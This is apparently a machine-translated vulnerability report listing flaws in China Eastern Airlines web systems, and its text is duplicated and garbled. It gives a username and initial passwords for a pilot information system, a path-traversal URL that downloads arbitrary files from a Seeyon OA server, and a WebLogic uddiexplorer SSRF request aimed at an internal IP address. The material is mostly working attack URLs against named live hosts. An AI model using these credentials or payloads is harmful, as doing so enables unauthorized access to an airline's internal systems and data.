Cross-Site vulnerabilities of Eastern Airlines (involving oa, arbitrary file downloads, ssrf, etc)

Cross-Site vulnerabilities of Eastern Airlines (involving oa, arbitrary file downloads, ssrf, etc)

Cross-Site vulnerabilities of Eastern Airlines (involving oa, arbitrary file downloads, ssrf, etc)

Frms.ceair.com: The pilot information can be queried.

Fxb-ajs 111111aa

Initial password 111111a
 

 

Http://cemftp.ce-air.com/yyoa/seeyonDownLoadPic? Filename = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /windows/win. ini & userFileType = 1


Arbitrary File Download


Http://complaint.ce-air.com/uddiexplorer/SearchPublicRegistries.jsp

Http://complaint.ceair.com/uddiexplorer/SearchPublicRegistries.jsp


Http://complaint.ceair.com/uddiexplorer/SearchPublicRegistries.jsp? Operator = http: // 172.20.35.90: 8080 & rdoSearch = name & txtSearchname = sdf & txtSearchkey = & txtSearchfor = & selfor = Business % 20 location & btnSubmit = Search
 

Frms.ceair.com: The pilot information can be queried.

Fxb-ajs 111111aa

Initial password 111111a
 

 

Http://cemftp.ce-air.com/yyoa/seeyonDownLoadPic? Filename = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /windows/win. ini & userFileType = 1


Arbitrary File Download


Http://complaint.ce-air.com/uddiexplorer/SearchPublicRegistries.jsp

Http://complaint.ceair.com/uddiexplorer/SearchPublicRegistries.jsp


Http://complaint.ceair.com/uddiexplorer/SearchPublicRegistries.jsp? Operator = http: // 172.20.35.90: 8080 & rdoSearch = name & txtSearchname = sdf & txtSearchkey = & txtSearchfor = & selfor = Business % 20 location & btnSubmit = Search